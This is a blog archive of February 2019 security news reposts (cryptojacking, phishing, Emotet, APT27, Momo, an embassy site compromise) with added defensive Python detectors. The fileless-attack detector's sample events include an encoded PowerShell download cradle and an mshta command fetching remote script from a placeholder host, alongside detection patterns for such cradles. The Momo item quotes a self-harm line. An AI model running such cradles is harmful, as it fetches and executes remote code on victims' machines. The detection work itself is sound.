Archive for February 2019

Coinhive Monero Miner Set to Close

Cryptocurrency mining tool Coinhive has decided to shut up shop, although not because of its rampant abuse by hackers over the past two years.

The team behind the Monero miner revealed all in a brief post on Tuesday, claiming that the 18-month project had come to an end as it was no longer economically viable.

“The drop in hash rate (over 50%) after the last Monero hard fork hit us hard. So did the ‘crash’ of the cryptocurrency market with the value of XMR depreciating over 85% within a year. This and the announced hard fork and algorithm update of the Monero network on March 9 has led us to the conclusion that we need to discontinue Coinhive,” it explained.

“Thus, mining will not be operable anymore after March 8, 2019. Your dashboards will still be accessible until April 30, 2019 so you will be able to initiate your payouts if your balance is above the minimum payout threshold.”

Although a legitimate browser-based mining tool, Coinhive sprung to notoriety quickly as it was abused by cyber-criminals around the world.

In February last year it was found running on over 4000 sites, including several belonging to US and UK government agencies, after attackers compromised a third-party accessibility script (Browsealoud) that all of those sites loaded: a single supply chain attack rather than 4000 separate break-ins.

As of December 2018, it remained the most prevalent ‘malware’ detected by Check Point for the 13th straight month, impacting 12% of organizations worldwide.

Other cryptocurrency mining software filled out the rest of the top four “most wanted” list compiled by the security vendor.

Although cryptojacking does not in itself steal data, it is not harmless: it degrades performance, can crash systems and, when miners land on corporate servers, drives up power consumption and charges and shortens replacement cycles for expensive kit.

Trend Micro claimed this week that detections of cryptocurrency mining malware passed the one million mark for the first time in 2018, a 237% increase from 2017 figures. However, hackers are increasingly expanding their methods of spreading these tools, to include exploit kits, plug-ins, abused ad platforms, server exploits and more, it said.

Source: Information Security Magazine

SSL-Based Phishing Surges 400% from 2017

Hackers are increasingly using encrypted traffic to hide their attacks from security filters, with phishing emails soaring in popularity, according to new data from Zscaler.

The cloud security provider processes more than 60 billion transactions per day and claimed that hiding threats in SSL traffic has become standard practice among the black hats.

Its biannual 2019 Cloud Security Insights Threat Report revealed that the vendor blocked 1.7 billion advanced threats hidden in SSL traffic from July to December 2018, amounting to an average of 283 million per month.

This included 2.7 million phishing attempts each month, an increase of over 400% from 2017 figures.

This chimes somewhat with a new report from Trend Micro released this week, which revealed the vendor blocked 269 million phishing URLs last year, a 269% increase over 2017.

Other malicious activity blocked by Zscaler in the second half of 2018 included 32 million botnet callback attempts per month, and 240,000 browser exploitation attempts. In addition, nearly 32% of newly registered domains blocked by the firm were ‘protected’ with SSL encryption.

Zscaler CTO, Amit Sinha, argued that the trend towards having everything encrypted by default is great for user privacy, but it presents a challenge to security teams.

“Decrypting, inspecting, and re-encrypting traffic is non-trivial, causing significant performance degradation on traditional security appliances, and most organisations are not equipped to inspect encrypted traffic at scale,” he added. “With a high percentage of threats now delivered with SSL encryption, and over 80% of internet traffic now encrypted, enterprises are blind to over half of malware sent to their employees.”
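Even without decrypting, a sensor on the wire can still read the TLS ClientHello: it carries the requested server name (SNI) in clear, together with the client's cipher and extension lists, which is the material a JA3-style fingerprint (the Salesforce method) is built from. The Python below is an added example written for this page, not Zscaler's code. It constructs a sample ClientHello (not a capture) and parses those fields back out; the hostname and cipher values are illustrative, and GREASE filtering follows RFC 8701.

```python
import hashlib
import struct

# GREASE values (RFC 8701) are random filler and are dropped from fingerprints.
GREASE = {(h << 8) | h for h in range(0x0A, 0x100, 0x10)}


def build_client_hello(server_name, ciphers, curves=(23, 24), point_formats=(0,)):
    """Construct a minimal TLS 1.2 ClientHello record (sample input, not a real capture)."""
    name = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name          # name type 0 = host_name
    sni_data = struct.pack("!H", len(sni_entry)) + sni_entry
    curves_data = struct.pack("!H", 2 * len(curves)) + b"".join(struct.pack("!H", c) for c in curves)
    pf_data = bytes([len(point_formats)]) + bytes(point_formats)
    exts = b"".join(struct.pack("!HH", t, len(d)) + d
                    for t, d in ((0, sni_data), (10, curves_data), (11, pf_data)))
    body = b"\x03\x03" + b"\x11" * 32 + b"\x00"                         # version, random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                                 # one compression method: null
    body += struct.pack("!H", len(exts)) + exts
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body          # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def parse_client_hello(record):
    """Return version, ciphers, extension types, SNI, groups and point formats from a ClientHello record."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) != hs_len:
        raise ValueError("truncated ClientHello")
    pos = 0
    version = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2 + 32                                   # skip client_version and random
    pos += 1 + body[pos]                            # skip session id
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    ciphers = [struct.unpack("!H", body[pos + i:pos + i + 2])[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                            # skip compression methods
    info = {"version": version, "ciphers": ciphers, "extensions": [],
            "server_name": None, "curves": [], "point_formats": []}
    if pos + 2 > len(body):
        return info                                 # no extensions block (legal for old clients)
    ext_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    end = min(pos + ext_len, len(body))
    while pos + 4 <= end:
        ext_type, data_len = struct.unpack("!HH", body[pos:pos + 4])
        pos += 4
        data = body[pos:pos + data_len]
        pos += data_len
        info["extensions"].append(ext_type)
        if ext_type == 0 and len(data) >= 5:        # server_name: list len(2), type(1), name len(2), name
            name_len = struct.unpack("!H", data[3:5])[0]
            info["server_name"] = data[5:5 + name_len].decode("ascii", "replace")
        elif ext_type == 10 and len(data) >= 2:     # supported_groups
            n = struct.unpack("!H", data[:2])[0]
            info["curves"] = [struct.unpack("!H", data[2 + i:4 + i])[0] for i in range(0, n, 2)]
        elif ext_type == 11 and data:               # ec_point_formats
            info["point_formats"] = list(data[1:1 + data[0]])
    return info


def ja3(info):
    """JA3 string and MD5: version,ciphers,extensions,curves,point_formats with GREASE removed."""
    keep = lambda vals: "-".join(str(v) for v in vals if v not in GREASE)
    s = ",".join([str(info["version"]), keep(info["ciphers"]), keep(info["extensions"]),
                  keep(info["curves"]), "-".join(str(v) for v in info["point_formats"])])
    return s, hashlib.md5(s.encode()).hexdigest()


if __name__ == "__main__":
    # Sample: TLS_AES_128_GCM_SHA256, ECDHE-RSA-AES128-GCM-SHA256 and one GREASE cipher
    sample = build_client_hello("example.com", [0x1301, 0xC02F, 0x2A2A])
    parsed = parse_client_hello(sample)
    print("SNI:", parsed["server_name"])
    print("JA3:", ja3(parsed))
```

The SNI and fingerprint are exactly what a filter can match on when full inspection is not deployed: a newly registered domain in the SNI, or a client fingerprint that belongs to a known tool rather than a browser, is visible in the first packet of the session. Encrypted SNI and TLS 1.3's encrypted extensions reduce what this yields, which is part of why the report expects inspection to become harder.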

Zscaler also noted an increase in SSL-based JavaScript skimming attacks on e-commerce sites, a reference to the growing number of bad actors using Magecart code to harvest shoppers' card details as they are entered. Popular brands including British Airways, Ticketmaster and Newegg have already been breached this way.

“With the increase in JavaScript skimmer-based attacks, criminals can conduct their nefarious activity within the confines of the SSL environment, leaving most e-commerce sites unaware of the activity,” warned Zscaler VP of security research, Deepen Desai.

Source: Information Security Magazine

Global Spam Calls Hit 85 Billion in 2018

Global spam calls have soared by 325% over 2018 to reach a staggering 85 billion worldwide, according to new findings from Hiya.

The Caller ID company claimed in its first Global Robocall Radar report that spam rates in Spain (24%), the UK (22%), Italy (21%) and France (20%) are the highest in the world.

These are more than mere nuisance calls: Hiya claimed that they can expose victims to serious fraud attempts.

The top four types of voice spam campaign listed include bank account scams in which the caller pretends to be a representative of the recipient’s bank with the aim of gaining account details, and “neighbor scams” in which the caller pretends to be a nearby friend or business, aided by VoIP software that spoofs their phone numbers.

The wangiri or one-ring scam sees the fraudsters call just once and in so doing entice users into calling back to premium rate international numbers owned by the scammer. Some robocalls even demand payment from random phone users for the return of a ‘kidnapped’ family member or friend.

Tactics vary from country to country. In the UK, robocalls pushing fake payment protection insurance (PPI) claims are common, as are malware-laden SMS messages spoofed to appear as if sent from HMRC.

In the US, calls pretending to come from the IRS and neighbor scams are popular, according to the report.

New rules introduced in September by UK regulator Ofcom could help to mitigate the threat from such spam calls.

They ban phone companies from charging for the Caller ID service that helps users screen their calls, and require that any number displayed to users is valid and can be called back.

Phone companies have also been forced to block calls with invalid numbers and Ofcom now has the power to take back whole blocks of numbers from telcos if they’ve been used repeatedly to carry out nuisance calls and fraud.

Source: Information Security Magazine

Threat Report Tries to Change Security's Narrative

Over the course of the second half of 2018, criminally motivated attackers were able to cause significant damage to enterprises without their knowledge by using not-so-sophisticated attacks, according to a new report from Gigamon.

Not surprisingly, the report found that the top three malware threats of 2018 were Emotet, LokiBot and TrickBot. While these malware threats seemed to be vying for position of most prevalent in the middle of the year, attackers increased their use of Emotet, which turned out to be the front-runner by the year’s end, according to the report.

"Most notably, Emotet’s rapid increase began in early November 2018, which continued through late December 2018. During this time, Emotet campaigns appeared daily with different attachment hashes, different attachment filenames and different email subject lines. On or about 21 December 2018, Emotet went silent and remained silent through the first weeks of 2019."

Despite being widely known in the security industry as the top threat and the most frequently delivered malware, Emotet still evades detection, and the report warned CISOs in particular about its ability to steal sensitive corporate information.

"Due to Emotet’s polymorphic nature, it is difficult to detect by signatures alone, so organizations must be able to identify Emotet’s network communications behaviors to mitigate its rapid proliferation. Security teams should examine both north/south C2 communications as well as east/west lateral communications."
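The report's advice is to find Emotet by what it does on the network rather than by signature. The Python below is an added example, not code from Gigamon's report, and applies two such behavioural checks to a constructed connection log: a north/south test that flags an inside host contacting one outside address at near-constant intervals (beaconing), and an east/west test that flags an inside host opening SMB sessions to many distinct peers within a short window. The log lines, the address ranges and the thresholds are assumptions for the demonstration, not indicators published by the report.

```python
import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed connection records "timestamp src dst dst_port"; not a real capture.
SAMPLE_LOG = """\
2018-12-03T09:00:00 10.0.1.15 203.0.113.7 8080
2018-12-03T09:05:01 10.0.1.15 203.0.113.7 8080
2018-12-03T09:10:00 10.0.1.15 203.0.113.7 8080
2018-12-03T09:14:59 10.0.1.15 203.0.113.7 8080
2018-12-03T09:20:00 10.0.1.15 203.0.113.7 8080
2018-12-03T09:00:10 10.0.1.20 198.51.100.9 443
2018-12-03T09:37:22 10.0.1.20 198.51.100.9 443
2018-12-03T10:12:05 10.0.1.20 198.51.100.9 443
2018-12-03T11:48:40 10.0.1.20 198.51.100.9 443
2018-12-03T13:02:11 10.0.1.20 198.51.100.9 443
2018-12-03T09:21:00 10.0.1.15 10.0.1.21 445
2018-12-03T09:21:01 10.0.1.15 10.0.1.22 445
2018-12-03T09:21:01 10.0.1.15 10.0.1.23 445
2018-12-03T09:21:02 10.0.1.15 10.0.1.24 445
2018-12-03T09:21:02 10.0.1.15 10.0.1.25 445
2018-12-03T09:21:03 10.0.1.15 10.0.1.26 445
2018-12-03T09:30:00 10.0.1.20 10.0.1.5 445
"""

# RFC 1918 ranges stand in for "inside"; adjust to the real address plan (assumption).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return records


def find_beacons(records, min_conns=5, max_cv=0.1):
    """North/south: internal->external flows whose gaps between connections are near-constant.
    min_conns and max_cv (coefficient of variation of the gaps) are illustrative thresholds."""
    flows = defaultdict(list)
    for ts, src, dst, port in records:
        if is_internal(src) and not is_internal(dst):
            flows[(src, dst, port)].append(ts)
    hits = []
    for (src, dst, port), times in flows.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "port": port, "period_s": round(mean), "cv": round(cv, 3)})
    return hits


def find_lateral_fanout(records, port=445, window_s=60, min_peers=5):
    """East/west: one internal host reaching many distinct internal peers on one port within a short window."""
    by_src = defaultdict(list)
    for ts, src, dst, p in records:
        if p == port and src != dst and is_internal(src) and is_internal(dst):
            by_src[src].append((ts, dst))
    hits = []
    for src, conns in by_src.items():
        conns.sort()
        for i, (start, _) in enumerate(conns):
            peers = {dst for ts, dst in conns[i:] if (ts - start).total_seconds() <= window_s}
            if len(peers) >= min_peers:
                hits.append({"src": src, "peers": len(peers), "first_seen": start.isoformat()})
                break
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for hit in find_beacons(recs):
        print("beacon:", hit)
    for hit in find_lateral_fanout(recs):
        print("lateral fan-out:", hit)
```

In the sample, 10.0.1.15 checks in with 203.0.113.7 every five minutes and then sweeps six neighbours on port 445 within three seconds, so both checks fire on the same host; 10.0.1.20's irregular HTTPS sessions and single SMB connection pass. The variation threshold is deliberately tight: real beacons add jitter and sleep through outages, so production logic works over longer windows, tolerates missed intervals and weights results by how rare the destination is across the estate. Both checks are starting points to tune against baseline traffic, not signatures.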

LokiBot also proved useful in business email compromise, as once it was installed, attackers were able to execute other malicious code. "Attackers tied to the ransomware outbreak in the Ukraine targeting major banks, utilities and telcos also installed a variant of LokiBot to not only make the compromised machine inoperable, but to also steal credentials and information."

According to the report, one objective of the research was to change the cybersecurity narrative by educating CISOs on how to mitigate these prevalent threats. To that end, the report advised that CISOs be dedicated to studying the behavior of successful threats, and apply known research in the development of a robust set of indicators and detection mechanisms. When security teams are able to leverage new indicators and detection mechanisms across comprehensive network visibility, they are better positioned to use gained insight that will enable them to reduce risk.

Source: Information Security Magazine

Scarlet Widow Targets K-12 Schools, Nonprofits

A gang of known scammers allegedly based in Nigeria is believed to be targeting schools in the K-12 sector along with the Boy Scouts and other nonprofit organizations around the world, according to a report published by Agari.

The group has been named "Scarlet Widow," and the most recent report reveals a new pattern of attacks targeting nonprofit organizations, K-12 school districts, and universities – using a directory scraping technique the Scarlet Widow gang calls 'bombing.' The group has also been identified as targeting single men and women with romance scams in early February. 

Using email fraud attacks, Scarlet Widow appears to go after some of the more vulnerable organizations around the globe, including dozens of small-town schools and school districts in Indiana and Wisconsin. Attackers have also reportedly gone after US and UK-based nonprofits including Boy Scouts of America and the Salvation Army as well as universities in Florida, the UK, New Zealand and Australia, Agari found.

"When Scarlet Widow goes after nonprofits, the group primarily uses publicly-accessible websites to scrape contact information for employees," wrote Crane Hassold, Agari's Senior Director of Threat Research. "Working off a list of identified websites that contain directories of nonprofit organizations, Scarlet Widow uses a web scraper to traverse the online directory and collect email addresses associated with each organization—a process they refer to as 'bombing' an online directory."

The attackers use business email compromise tactics against targets including a chapter of the United Way, a Texas-based ballet foundation, a North Carolina physician, a Catholic archdiocese in the Midwest and several chapters of the YMCA. Agari's investigation found that Scarlet Widow had collected information on more than 30,000 individuals at 13,000 organizations across 12 countries.

The Scarlet Widow scammers have reportedly been using a peer-to-peer cryptocurrency exchange, Paxful, to convert fake gift cards into cryptocurrency. In investigating Scarlet Widow, researchers found that, "By first advertising the stolen cards on Paxful, the group can successfully turn them into bitcoin, which they can then trade on Remitano for a specified price. Once the Scarlet Widow actors have exchanged their bitcoin and the buyer’s funds are in their bank account, the process of converting illicit gift cards into cash is complete."

Source: Information Security Magazine

APT Uses Arsenal of Tools to Evade Detection

The advanced persistent threat (APT) group tracked since 2013 as BRONZE UNION, and also known as Emissary Panda, APT27 and LuckyMouse, is believed to be based in China, according to Secureworks.

Published today, the two reports, State of the [BRONZE] UNION Snapshot and A Peek into BRONZE UNION’s Toolbox, are based on nearly two years of continuous, in-depth visibility into the group’s campaigns.

Researchers have tracked the group’s activities, including its persistent and long-term approach to espionage, and their analysis of network compromises suggests that since 2016 BRONZE UNION has been using a range of capabilities and tactics to target data mostly from political, technology, manufacturing and humanitarian organizations.

Focused on espionage activities, the threat group’s tactics ranged from stealing data about cutting-edge weapons technologies to spying on dissidents and other civilian groups, according to researchers.

Using stolen credentials, the threat actors have been able to compromise business email accounts and then use that access to perform different tasks from keyword searches to downloading email attachments and data.

The group’s arsenal of intrusion methods and tools is a problem for defenders: the attackers’ skill lets them evade common security tools and escalate their privileges, according to the report.

The group often uses services, tools and credentials native to the compromised environment, a technique commonly known as living off the land. "After obtaining access to a network, the threat actors are diligent about maintaining access to high-value systems over long periods of time,” researchers wrote.

A distinguishing pattern of BRONZE UNION activity is a routine maintenance schedule: the actors return to compromised networks roughly every three months. Researchers suspect this schedule aligns with the interval many organizations use to force password changes.

“The threat actors have access to a wide range of tools, so they can operate flexibly and select tools appropriate for intrusion challenges. During complex intrusion scenarios, the threat actors leverage their proprietary tools, which offer custom functionality and lower detection rates.”

Source: Information Security Magazine

Malicious Suicide Game, Momo Challenge, Targets Kids

Police in Northern Ireland and National Online Safety have issued warnings to parents regarding the disturbing and potentially dangerous Momo Challenge that has resurfaced in social media apps, including WhatsApp and YouTube Kids.

According to a report in the Mirror, hackers have spliced images of Momo into children’s videos, including Peppa Pig and Fortnite clips. The images show a number for viewers to text to contact Momo on WhatsApp, at which point the operators ask them to perform seemingly meaningless tasks. The requests eventually become far more sinister.

“Momo is a sinister ‘challenge’ that has been around for some time. It has recently resurfaced and once again has come to the attention of schools and children across the country. Dubbed the ‘suicide killer game,’ Momo has been heavily linked with apps such as Facebook, WhatsApp, YouTube, and most recently (and most worryingly)…YouTube Kids,” National Online Safety warned.

The frightening figure is that of a doll with bulging eyes and powder-white skin who reportedly shares disturbing graphic images both depicting violence and asking recipients to partake in dangerous challenges.

According to PediMom, a parenting blog, when the challenge surfaced several months ago a mother reported that her child was watching a YouTube Kids video when, “four minutes and forty-five seconds into the video, the man quickly walked in, held his arm out, and tracing his forearm, said, ‘Kids, remember, cut this way for attention, and this way for results,’ and then quickly walked off.”

The consistent message from police is that parents should reassure their children that this challenge, and others like it, are not real. Hackers are believed to be using Momo to harvest information from participants.

A spokesperson for the NSPCC in Northern Ireland told the BBC, "The constantly evolving digital world means a steady influx of new apps and games and can be hard for parents to keep track of. That's why it's important for parents to talk regularly with children about these apps and games and the potential risks they can be exposed to.”

The NSPCC also issued a warning on its Facebook page advising parents to monitor their children's online time and supervise them when playing games or watching videos. The NSPCC noted: "This game conceals itself within other harmless looking games played by our kids! There have also been reports of parts of the game being viewable on YouTube…when downloaded tells your child to communicate with them via WhatsApp and a number of other widely used apps. ‘Momo’ then tells your child to self harm or she will put a curse on them!"

Source: Information Security Magazine

Hackers Exploit Bangladesh Embassy in Cairo Site

Attackers have been exploring new forms of phishing bait that will entice users to click and have reportedly had success exploiting Bangladesh's Cairo embassy website, according to researchers at Trustwave.

Research at the end of October 2018 showed Trustwave’s filters blocking the CoinImp web miner on a government domain. Only two months later, the threat team detected a Microsoft Word document with an embedded malicious EPS script being served from the same domain. According to today’s blog post, the document contains an EPS file that exploits a use-after-free vulnerability in Office’s EPS filter, CVE-2017-0261.

Detection rates for the malicious page were low. However, when researchers tried to access most of the pages on the site they were prompted to save a file instead, indicating that the attackers had control of the embassy's website.

“We contacted the compromised domain in an attempt to alert them of the infection, unfortunately we received no response and at the time of publishing this blog the site remains infected,” researchers wrote.

Through their analysis, researchers noted that the file appeared to have been modified in October 2018, adding, “It’s possible that after running a wider infection campaign infecting sites with a web miner, the attacker looked through their victims to find more interesting targets to leverage further.”

The payload then exploits CVE-2017-7255 to escalate privileges before running the main payload, the Godzilla loader. Once communication with the C2 server is established the attacker can drop additional executables; in this case the researchers identified an additional downloader that delivered a cryptominer.
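The lure described above is a Word document carrying an EPS image, and EPS inside an Office file is rare enough in ordinary business documents that its mere presence is worth quarantining at the mail gateway. The Python below is an added example written for this page, not Trustwave's code: it opens an OOXML package (.docx is a zip), reads the declared content types and flags any part that is EPS by declared type, by extension or by file signature, so a renamed part does not slip through. The sample package is constructed in the code and is not a real document; the content type string and the two EPS signatures (the ASCII "%!PS" header and the DOS EPS binary header C5 D0 D3 C6) are the standard ones.

```python
import io
import re
import zipfile

# Content types Office uses for EPS parts, plus the two EPS file signatures (ASCII and DOS binary header).
EPS_CONTENT_TYPES = {"image/x-eps", "application/postscript"}
EPS_MAGIC = (b"%!PS", b"\xc5\xd0\xd3\xc6")


def build_sample_docx(with_eps):
    """Construct a minimal OOXML package for the demonstration; not a real document."""
    defaults = ('<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                '<Default Extension="xml" ContentType="application/xml"/>'
                '<Default Extension="png" ContentType="image/png"/>')
    if with_eps:
        defaults += '<Default Extension="eps" ContentType="image/x-eps"/>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   + defaults + "</Types>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/media/image1.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        if with_eps:
            z.writestr("word/media/image2.eps", b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 10 10\n")
            # Same content under a misleading extension: caught by the signature check, not the name.
            z.writestr("word/media/image3.bin", b"%!PS-Adobe-3.0 EPSF-3.0\n")
    return buf.getvalue()


def find_eps_parts(package_bytes):
    """Return the names of parts that are EPS by declared content type, extension or file signature."""
    hits = set()
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as z:
        eps_exts = {"eps", "ps"}
        if "[Content_Types].xml" in z.namelist():
            ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
            # Extensions mapped to an EPS type, and parts overridden to an EPS type.
            for ext, ctype in re.findall(r'<Default\s+Extension="([^"]+)"\s+ContentType="([^"]+)"', ct):
                if ctype.lower() in EPS_CONTENT_TYPES:
                    eps_exts.add(ext.lower())
            for part, ctype in re.findall(r'<Override\s+PartName="([^"]+)"\s+ContentType="([^"]+)"', ct):
                if ctype.lower() in EPS_CONTENT_TYPES:
                    hits.add(part.lstrip("/"))
        for info in z.infolist():
            if info.is_dir():
                continue
            ext = info.filename.rsplit(".", 1)[-1].lower() if "." in info.filename else ""
            with z.open(info) as f:
                head = f.read(4)
            if ext in eps_exts or head.startswith(EPS_MAGIC):
                hits.add(info.filename)
    return sorted(hits)


if __name__ == "__main__":
    print("clean package:", find_eps_parts(build_sample_docx(False)))
    print("with EPS:", find_eps_parts(build_sample_docx(True)))
```

The check reports presence, not exploitation: it says nothing about whether the PostScript inside triggers CVE-2017-0261. Two caveats for deployment. Microsoft turned the Office EPS filter off by default in updates from 2017, so on patched hosts the image is inert, but an attachment still carrying one in 2019 is a strong signal in its own right. And this only covers OOXML; legacy binary .doc and RTF carriers need a different parser.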

Source: Information Security Magazine

Trend Micro Blocks Over 48 Billion Threats in 2018

BEC, cryptojacking, phishing and fileless malware attacks all surged in 2018 as cyber-criminals increasingly moved away from one-size-fits-all approaches, according to Trend Micro.

The security vendor’s 2018 roundup report, Caught in the Net: Unraveling the Tangle of Old and New Threats, revealed it blocked over 48.3 billion threats over the 12-month period.

The vast majority of these (41.5 billion) were email borne.

They included over 269 million phishing URL detections, a 269% increase on 2017. Business email compromise (BEC), which also targets users through social engineering, saw 28% more attempted attacks than in 2017.

Cryptojacking detections passed the one million mark for the first time, a 237% increase from 2017 figures, with attacks spread across: abused ad platforms; pop-up ads; server exploits; malicious browser extensions; mobile phones; plug-ins; botnets; bundling with legitimate software; exploit kits; and repurposed ransomware.

Fileless techniques showed the biggest rise in detections, up 819% over the year. The vendor warned that these attacks, which typically try to circumvent traditional filters, can usually be detected only via other means such as traffic monitoring, behavioral indicators or sandboxing.
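Because a fileless attack leaves nothing on disk for a file scanner, the behavioural indicators the report refers to usually come from process-creation telemetry: which process started which, and with what command line. The Python below is an added example, not Trend Micro's code. It runs a few such rules over constructed Sysmon-style events (not real telemetry): an Office application spawning a script host, a hidden no-profile PowerShell, an encoded command (which it decodes from UTF-16LE base64 so the cradle inside cannot hide), download cradles, and common LOLBin patterns. The paths, URL and rule thresholds are assumptions for the demonstration.

```python
import base64
import binascii
import re

# Constructed encoded payload for the sample event below (a typical download cradle), not from a real incident.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')".encode("utf-16le")
).decode("ascii")

# Constructed Sysmon-style process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell -nop -w hidden -enc " + ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/update.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\Public\invoice.js"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
CRADLE_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|"
                       r"Invoke-WebRequest|FromBase64String", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e, -ec and -enc are the common ones.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
LOLBIN_RULES = [
    (re.compile(r"mshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)", re.I), "mshta remote/inline script"),
    (re.compile(r"regsvr32(?:\.exe)?.*\s/i:https?:", re.I), "regsvr32 scriptlet from URL"),
    (re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.I), "rundll32 javascript: handler"),
    (re.compile(r"\bwmic\b.*process\s+call\s+create", re.I), "wmic process creation"),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text) or return None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "replace")
    except (binascii.Error, ValueError):
        return None


def analyse_event(ev):
    """Return the list of suspicious traits found in one process-creation event."""
    parent, image = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(f"office application {parent} spawned {image}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell command")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I) and re.search(r"-nop(?:rofile)?\b", cmd, re.I):
        findings.append("hidden no-profile PowerShell")
    # Match cradles against the decoded text as well, so encoding does not hide them.
    if CRADLE_RE.search(cmd + "\n" + (decoded or "")):
        findings.append("download/in-memory execution cradle")
    findings.extend(label for rx, label in LOLBIN_RULES if rx.search(cmd))
    return findings


def scan(events):
    """Run the rules over a list of events; return only the events that triggered something."""
    results = []
    for ev in events:
        findings = analyse_event(ev)
        if findings:
            results.append({"image": basename(ev.get("Image", "")), "findings": findings})
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["image"], "->", "; ".join(r["findings"]))
```

The third event, an administrator's scheduled script run with an execution-policy bypass, triggers nothing on its own, which is the point of scoring several traits together rather than alerting on any one flag: bypass switches are common in legitimate automation, while an Office parent plus a hidden, encoded PowerShell with a download cradle almost never is. Command-line logging can be evaded by passing the script via stdin or a pipe, so pair this with PowerShell script block logging where it is available.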

Another trend is cyber-criminals continuing to exploit known vulnerabilities rather than spending time and money on researching zero-days. Trend Micro’s Zero Day Initiative (ZDI) bought and disclosed more vulnerabilities in 2018 than ever before.

“This reverse strategy of first studying a disclosed vulnerability, even if it has been patched in the same advisory, then developing an exploit for it has become quite common over the years,” the report noted. “But it appears that cyber-criminals are correct in assuming that not all enterprises will be able to patch their systems in time, if at all.”

The ZDI also bought and disclosed 224% more industrial control system (ICS) bugs in 2018, including many in these systems’ human-machine interfaces (HMIs), which should concern those managing operational technology environments.

Trend Micro noted a 91% decrease in ransomware threats over the year and a 32% drop in new ransomware families, but warned that it still remains a serious threat.  

Interestingly, the number of threats blocked was down from 2017 (66.4 billion) and 2016 (81 billion) figures: perhaps an indication that they’re becoming more targeted.

Source: Information Security Magazine

Most UK IT Security Leaders Fear CNI Attack

Over half of organizations believe the UK is heading for a major attack on critical national infrastructure (CNI) this year, with siloed teams leaving dangerous security gaps between IT and OT functions, according to Infosecurity Europe.

The region’s leading information security event polled over 12,000 social media followers and its community of CISOs to better understand the challenges facing organizations in CNI sectors.

Some 59% agreed that a CNI attack was imminent in 2019, echoing National Cyber Security Centre (NCSC) boss Ciaran Martin, who said last year that the nation’s first category one (C1) attack was a matter of “when, not if.” WannaCry was rated a C2 incident.

